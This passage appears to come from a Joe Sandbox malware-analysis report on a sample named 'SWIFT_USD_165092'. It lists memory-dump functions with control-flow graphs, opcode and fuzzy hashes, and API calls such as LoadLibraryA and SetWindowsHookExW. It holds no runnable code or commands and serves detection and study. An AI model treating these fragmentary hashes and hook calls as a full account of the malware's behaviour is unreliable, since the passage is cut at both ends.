106->105 107->88 110 6b43631-6b43640 108->110 109->110 110->3 111 6b43646-6b4365b 110->111 111->3 112 6b43661-6b43682 111->112 112->3 113 6b43688-6b436b0 112->113 113->3 114 6b436b6-6b436de 113->114 114->3 115 6b436e4-6b43715 114->115 115->3 116 6b4371b-6b4372c 115->116 117 6b43740-6b43755 116->117 118 6b4372e-6b43732 116->118 117->3 120 6b4375b-6b4376f 117->120 118->117 119 6b43734 118->119 121 6b437b9-6b437dc 119->121 122 6b4373a-6b4373e 119->122 120->3 123 6b43775-6b43789 120->123 121->3 125 6b437e2-6b43820 121->125 122->117 122->121 123->3 124 6b4378f-6b437a3 123->124 124->3 127 6b437a9-6b437b4 124->127 125->3 126 6b43826-6b43864 125->126 126->3 128 6b4386a-6b438a8 126->128 129 6b438be-6b438d7 127->129 128->3 130 6b438ae-6b438b8 128->130 132 6b438d9-6b438f7 129->132 133 6b438fa-6b438fe 129->133 130->129 132->133 134 6b43930-6b43939 133->134 135 6b43900-6b43908 133->135 134->3 136 6b4393b-6b43952 134->136 138 6b43912-6b4392d 135->138 139 6b4390a-6b4390f 135->139 136->3 140 6b43954-6b43971 136->140 138->134 139->138
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -$.
                                                                                        • API String ID: 0-3807043784
                                                                                        • Opcode ID: 523a68b263c1472c29bd8895df26ddd42d6866cc4bb8ebaa578863363bfbf301
                                                                                        • Instruction ID: 592d0c47234eb6a4ae543b4d697731afcf2976ca197b1c38e6d4848d2fe25afa
                                                                                        • Opcode Fuzzy Hash: 523a68b263c1472c29bd8895df26ddd42d6866cc4bb8ebaa578863363bfbf301
                                                                                        • Instruction Fuzzy Hash: 6F827E70914269CBDB65CF29CC817E8BBF2BB45300F5881E5D88AAB356D7349E81DF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B42A1E Relevance: 2.0, Strings: 1, Instructions: 799COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: acc664bbab047e1e351071110b2e5df977c94e280c5c39ada8cef279584eafa9
                                                                                        • Instruction ID: cee0f475afb1859d345250672e1e30558787c847b2e7d6cfa4b129d17e2df4de
                                                                                        • Opcode Fuzzy Hash: acc664bbab047e1e351071110b2e5df977c94e280c5c39ada8cef279584eafa9
                                                                                        • Instruction Fuzzy Hash: F0729370A10255CFDB25DF29C884BADB7F2FF45310F5881A9E88A9B396D7309D81DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B41660 Relevance: 1.1, Instructions: 1066COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f3e1398848c52ecee81576b69e9729f778e298e723d59fc3ecbf9a3df55db2f
                                                                                        • Instruction ID: 81c1fe24611f46f0303da1c26b550cd26659440d9e464e416e8c59f5e971bd42
                                                                                        • Opcode Fuzzy Hash: 7f3e1398848c52ecee81576b69e9729f778e298e723d59fc3ecbf9a3df55db2f
                                                                                        • Instruction Fuzzy Hash: D6A29CB1A00224CFDB64CB18C984BA8BBF2EF45304F1981E9E5899B356C775EE85DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7ADE8 Relevance: .3, Instructions: 341COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2390 d7ade8-d7ae03 2391 d7b035-d7b046 2390->2391 2392 d7ae09-d7ae10 2390->2392 2401 d7b04f-d7b05e 2391->2401 2393 d7ae12-d7ae1b 2392->2393 2394 d7ae1c-d7ae3b 2392->2394 2396 d7ae41-d7ae62 2394->2396 2397 d7b028-d7b034 2394->2397 2398 d7ae64-d7ae68 2396->2398 2399 d7ae6a-d7ae98 2396->2399 2398->2399 2400 d7ae9a 2398->2400 2403 d7ae9d-d7af23 call d7a020 2399->2403 2400->2403 2407 d7b064-d7b075 2401->2407 2462 d7af25 call d7ade5 2403->2462 2463 d7af25 call d7b1c2 2403->2463 2464 d7af25 call d7b080 2403->2464 2465 d7af25 call d7ade8 2403->2465 2407->2401 2410 d7b077-d7b17c 2407->2410 2426 d7b185-d7b1d0 2410->2426 2427 d7b17e-d7b184 2410->2427 2419 d7af2b-d7af39 call d7a530 2424 d7af3b-d7af3d 2419->2424 2425 d7af98-d7af9c 2419->2425 2430 d7af81-d7af90 2424->2430 2428 d7afdf-d7afe6 2425->2428 2429 d7af9e-d7afab 2425->2429 2452 d7b1d2 2426->2452 2453 d7b1da-d7b1de 2426->2453 2427->2426 2434 d7affa-d7affe 2428->2434 2435 d7afe8-d7afef 2428->2435 2432 d7afbf-d7afd1 2429->2432 2433 d7afad-d7afb2 2429->2433 2430->2425 2431 d7af92 2430->2431 2437 d7af94-d7af96 2431->2437 2438 d7af3f-d7af4b 2431->2438 2439 d7b020-d7b025 2432->2439 2449 d7afd3-d7afdd 2432->2449 2433->2432 2442 d7afb4-d7afbd 2433->2442 2434->2439 2440 d7b000-d7b007 2434->2440 2435->2434 2436 d7aff1 2435->2436 2436->2434 2437->2425 2437->2438 2438->2407 2445 d7af51-d7af80 2438->2445 2439->2397 2440->2439 2444 d7b009-d7b01f 2440->2444 2442->2439 2445->2430 2449->2439 2452->2453 2456 d7b1e0-d7b1ec 2453->2456 2457 d7b1fa 2453->2457 2458 d7b1f4 2456->2458 2459 d7b1ee-d7b1f1 2456->2459 2460 d7b1fb 2457->2460 2458->2457 2459->2458 2460->2460 2462->2419 2463->2419 2464->2419 2465->2419
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6b6216e5581cfbef887b9ac430757c038773c05a353bf69d3781af14fcf14ae
                                                                                        • Instruction ID: 423385f451c2a99611a61b4181a16cfcfe857194a62b07d2e74f294d58d932aa
                                                                                        • Opcode Fuzzy Hash: f6b6216e5581cfbef887b9ac430757c038773c05a353bf69d3781af14fcf14ae
                                                                                        • Instruction Fuzzy Hash: 60D13D75E00209DFCB14DFA8D494AAEFBF1FF88310F14855AE419AB351DB34A946CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D77010 Relevance: .3, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 51bb3274f72c03a3543b01d62b44e92151df4148948a1137bb5b304744dd8b97
                                                                                        • Instruction ID: 9e74c9617234c1b22ce492d1a1b0aae33c3817ab098169af5ab0a84a443d0b74
                                                                                        • Opcode Fuzzy Hash: 51bb3274f72c03a3543b01d62b44e92151df4148948a1137bb5b304744dd8b97
                                                                                        • Instruction Fuzzy Hash: DEB12D70E04209CFDF14CFA9C98579EBBF2BF88704F18C529E819A7254EB749845CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D778E0 Relevance: .3, Instructions: 266COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0634657a1d746223fb2ec0ff0af9c7904bbf868b4dec6bb2053dfbe6a0e57675
                                                                                        • Instruction ID: f1a0306523d00a6a59bfdc9d5320c5f5f6ba42dbf906c0e0d7903884a0ff2762
                                                                                        • Opcode Fuzzy Hash: 0634657a1d746223fb2ec0ff0af9c7904bbf868b4dec6bb2053dfbe6a0e57675
                                                                                        • Instruction Fuzzy Hash: 0BB13E70E04209CFDB10CFA9C9857ADBBF2AF88714F18C929E419E7254EB749985CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74104 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 406 d74104-d74167 407 d741bb-d74207 LoadLibraryA 406->407 408 d74169-d7418e 406->408 412 d74210-d74241 407->412 413 d74209-d7420f 407->413 408->407 411 d74190-d74192 408->411 415 d741b5-d741b8 411->415 416 d74194-d7419e 411->416 418 d74243-d74247 412->418 419 d74251 412->419 413->412 415->407 420 d741a2-d741b1 416->420 421 d741a0 416->421 418->419 422 d74249 418->422 424 d74252 419->424 420->420 423 d741b3 420->423 421->420 422->419 423->415 424->424
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: dd3c03e29aa0a5020c626bbf3236ef305552d2341585c6f5e92c816e31e46ea8
                                                                                        • Instruction ID: 7bf13d239e847cff7714ce9b666fad60cac4148efc59a7eccd2a3d88327b12d3
                                                                                        • Opcode Fuzzy Hash: dd3c03e29aa0a5020c626bbf3236ef305552d2341585c6f5e92c816e31e46ea8
                                                                                        • Instruction Fuzzy Hash: D2414AB1D103489FDB11DFA9C88579EBBF1EF48314F148129E819AB381E7749885CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D721CC Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 425 d721cc-d74167 427 d741bb-d74207 LoadLibraryA 425->427 428 d74169-d7418e 425->428 432 d74210-d74241 427->432 433 d74209-d7420f 427->433 428->427 431 d74190-d74192 428->431 435 d741b5-d741b8 431->435 436 d74194-d7419e 431->436 438 d74243-d74247 432->438 439 d74251 432->439 433->432 435->427 440 d741a2-d741b1 436->440 441 d741a0 436->441 438->439 442 d74249 438->442 444 d74252 439->444 440->440 443 d741b3 440->443 441->440 442->439 443->435 444->444
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 79b2262bd969ce490d51f2f455d30ef5f6c03868a62fcda4cc885928eeeb0632
                                                                                        • Instruction ID: 7c49ab0f5560c8dda93aa4987f65a2fd0da481ef7945aafc210e3e4d2075f14c
                                                                                        • Opcode Fuzzy Hash: 79b2262bd969ce490d51f2f455d30ef5f6c03868a62fcda4cc885928eeeb0632
                                                                                        • Instruction Fuzzy Hash: 33414AB1D00318DFDB11DF99C88579EBBF1EB48304F148129E819AB741E7749885CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7E2C8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1065 d7e2c8-d7e31a 1068 d7e326-d7e358 SetWindowsHookExW 1065->1068 1069 d7e31c 1065->1069 1070 d7e361-d7e386 1068->1070 1071 d7e35a-d7e360 1068->1071 1072 d7e324 1069->1072 1071->1070 1072->1068
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00D7E34B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: e342a9830bec97ae74cbc6977fadff3a310e50fc021dc6c7caa47f9127909b38
                                                                                        • Instruction ID: 70bc3c1e50892807444431a8a3b4168779c8153aaffc6baa48fa7b29766eaea2
                                                                                        • Opcode Fuzzy Hash: e342a9830bec97ae74cbc6977fadff3a310e50fc021dc6c7caa47f9127909b38
                                                                                        • Instruction Fuzzy Hash: 872129B1D00209DFDB14CFA9D844BEEBBF5BF88320F14856AD469A7290D774A944CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7E2D0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1076 d7e2d0-d7e31a 1078 d7e326-d7e358 SetWindowsHookExW 1076->1078 1079 d7e31c 1076->1079 1080 d7e361-d7e386 1078->1080 1081 d7e35a-d7e360 1078->1081 1082 d7e324 1079->1082 1081->1080 1082->1078
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00D7E34B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 2b19afb9c444f1bbcd91a997045d4e432e51ead9b5fa1139c105b84726ea9555
                                                                                        • Instruction ID: 394c237f76477f5635a8c7e24d405a30e49e5b9d27633c458a21542526e5ea78
                                                                                        • Opcode Fuzzy Hash: 2b19afb9c444f1bbcd91a997045d4e432e51ead9b5fa1139c105b84726ea9555
                                                                                        • Instruction Fuzzy Hash: D02115B1D002099FDB14DFAAD844BEEBBF5BF88310F148429E459A7250D774A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B40040 Relevance: .3, Instructions: 302COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13864740458b707a3bd3b24c04830706c3b357dc7dd90ec1a3272d3ef3ed98ab
                                                                                        • Instruction ID: acbd0fc4d1b1c1362a2bcc20c03751320b3703caa4c4d02181b48dadc848961c
                                                                                        • Opcode Fuzzy Hash: 13864740458b707a3bd3b24c04830706c3b357dc7dd90ec1a3272d3ef3ed98ab
                                                                                        • Instruction Fuzzy Hash: 18C1B0B49046669FCB56EB28C4C0EBCFBB1FF09310B198195D5A997616C330F891DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B426A8 Relevance: .3, Instructions: 262COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e983905b0e20708ee3e6bd2d1479734262fca5b5ecf79057b3e979cff44b587
                                                                                        • Instruction ID: b07fe38e9e44c1a367a5e88344db9a6c6ee964588db12be94d161a17e99354fa
                                                                                        • Opcode Fuzzy Hash: 7e983905b0e20708ee3e6bd2d1479734262fca5b5ecf79057b3e979cff44b587
                                                                                        • Instruction Fuzzy Hash: 87A1E6B0E002598FDF54EF99C8447AEBBB6FF88310F1481A9E411A7395CB745982EF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B41310 Relevance: .2, Instructions: 229COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d201d3031c49f5c1fe4d4ec830078a5bb58e9ab3a3b00c213324b01773f98b31
                                                                                        • Instruction ID: c66d0997ea048a8b9758ae61e1e5d674dfc355faeec99b9cd243164746168a71
                                                                                        • Opcode Fuzzy Hash: d201d3031c49f5c1fe4d4ec830078a5bb58e9ab3a3b00c213324b01773f98b31
                                                                                        • Instruction Fuzzy Hash: CA810471D002019FC7A0DF6DC8809AABBF5FF89310B1985EAD458DB612E735EC42CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B40E60 Relevance: .2, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d999fc60b22cc0265ba1f7cf6892ed5e1cc756b5d3cf4a31ddef8adafb48539
                                                                                        • Instruction ID: eea40a22f7ca32ad23fb8232313ee1613c6e8c39c8ccc9e34ba38a877cb90658
                                                                                        • Opcode Fuzzy Hash: 2d999fc60b22cc0265ba1f7cf6892ed5e1cc756b5d3cf4a31ddef8adafb48539
                                                                                        • Instruction Fuzzy Hash: 5871AAB0E04258CFCB50EF58C884ABEBBB5FF89314F15819AD444AB312D335A996DF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B40410 Relevance: .1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec191dc7eb68978ae5485da12b72d9b33be8cf8ee42e365fc0c79823b0c316a9
                                                                                        • Instruction ID: acf05c2493963d1b55526690b1524fa83ff5df37746f215a05628fdc054ad6d6
                                                                                        • Opcode Fuzzy Hash: ec191dc7eb68978ae5485da12b72d9b33be8cf8ee42e365fc0c79823b0c316a9
                                                                                        • Instruction Fuzzy Hash: 5831E6757106148FEB69BB29D898A2E7BF6FBD8311B148558FA4787740CF34A902DF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B441E4 Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb3c585b4967a4caadae5f30c54c4a25f9379b4c591235ffe4f6b8bcade3d211
                                                                                        • Instruction ID: cf24fdf8b447e2b4f151db26d323dd35a7e9b4b40640df7bbd235487e73c042c
                                                                                        • Opcode Fuzzy Hash: fb3c585b4967a4caadae5f30c54c4a25f9379b4c591235ffe4f6b8bcade3d211
                                                                                        • Instruction Fuzzy Hash: 6A3159B1D00248EFDB10DFA9C980ADEBFF5EF48700F148429E405AB250DB789941DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B421AA Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 094e84e2fccd79433a88f474282d6f5ede5402db788edabe97d2b6f663668096
                                                                                        • Instruction ID: 4985cc87bb37369725aae6ed4dc2499415faeb6de88e5cc000ac9a5b6f807d9a
                                                                                        • Opcode Fuzzy Hash: 094e84e2fccd79433a88f474282d6f5ede5402db788edabe97d2b6f663668096
                                                                                        • Instruction Fuzzy Hash: 0C3161B4B002149FEB54DB25CD85FAAB7B2EF80340F0480E5E7499B2A1DE74AE80DB55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B441F0 Relevance: .1, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4662d3625eb17d7ad6a330217a4a5400ef142dedc05897bf596797f2946818f7
                                                                                        • Instruction ID: 5738942d7ed121c5fa71c4c5ca9bc0103ec0c46fdd84d858c937e465a68863b3
                                                                                        • Opcode Fuzzy Hash: 4662d3625eb17d7ad6a330217a4a5400ef142dedc05897bf596797f2946818f7
                                                                                        • Instruction Fuzzy Hash: 453148B0D00248DFDB10DFAAC580ADEBFF5EF48700F248429E409AB250DB389941DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D1D3DC Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523172169.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d1d000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4e0076e8f73f604104dbcfe38e91198011f8634ed4c7d456b9800c8e1ac7cea9
                                                                                        • Instruction ID: f0c4b37a5da1aac62e6c8eb613899ddb286669b82e82e517631a86d24c84835e
                                                                                        • Opcode Fuzzy Hash: 4e0076e8f73f604104dbcfe38e91198011f8634ed4c7d456b9800c8e1ac7cea9
                                                                                        • Instruction Fuzzy Hash: 56213372504240EFDB05DF14E9C0B96BF66FB98320F24C669E8450B206C736E886D7B2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B40400 Relevance: .1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e4d3e4600678f6240f07d2f28d2bc9877d4d90a88d85ca16d0147ead0f7f9292
                                                                                        • Instruction ID: c907e9c52b6f91fc693cb27fe6964dd95724c982a4cbe67b2e89ef8d594d24cd
                                                                                        • Opcode Fuzzy Hash: e4d3e4600678f6240f07d2f28d2bc9877d4d90a88d85ca16d0147ead0f7f9292
                                                                                        • Instruction Fuzzy Hash: 3E216575705B04CFD7687B39E848A6EBBA6FFC8211F14846EE65687341CF34A802DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D2D0FC Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523277257.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d2d000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52bda22bfe566bb4d16c3b28aaa856d8aaf1fb626faa9e796cb3a5f38443282b
                                                                                        • Instruction ID: 2ddd5e981accba117d13fb30a6a31ab19ac0249f3b4d75f80baab22b8c44ba18
                                                                                        • Opcode Fuzzy Hash: 52bda22bfe566bb4d16c3b28aaa856d8aaf1fb626faa9e796cb3a5f38443282b
                                                                                        • Instruction Fuzzy Hash: C2213771504340DFDB06CF14E9C0B26BBA2FB94328F24C969D8494B646C336D856DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D1D3D7 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523172169.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d1d000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction ID: 257aa0810008b5107200d831bb2288a6ce0840745ceba55de2ff205d1228b37c
                                                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction Fuzzy Hash: 28112672504280DFCB06CF00D5C0B56BF72FB94324F28C6A9D8040B616C33AE896CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D2D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523277257.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d2d000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
